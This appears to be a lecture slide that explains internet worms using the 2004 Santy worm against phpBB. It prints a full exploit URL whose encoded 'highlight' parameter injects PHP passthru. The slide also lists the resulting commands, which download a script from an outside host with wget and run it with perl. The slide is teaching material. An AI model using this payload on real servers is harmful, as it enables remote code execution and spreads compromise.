Internet Worm example

  • A Worm compromises a system, automatically turns it into a source of a new attack and attacks another host on the Internet.
  • For example, Santy worm attacks Web servers with Apache+PHP and phpBB < 2.0.11 running. In December 2004, it used Google search engine to identify web servers with phpBB application installed to attack them.

    http://www.some_website.com/phpBB2/viewtopic.php?t=23&rush=cd%20/tmp;
    wget%20www.segfaultbr.hpgvip.com.br/uteis/dc;
    perl%20dc&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%
    45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
    
    makes phpBB to execute the following commands as user apache:
    cd /tmp; wget www.segfaultbr.hpgvip.com.br/uteis/dc
    perl dc
    

    Previous Pageprevious First Pagetop Next Pagenext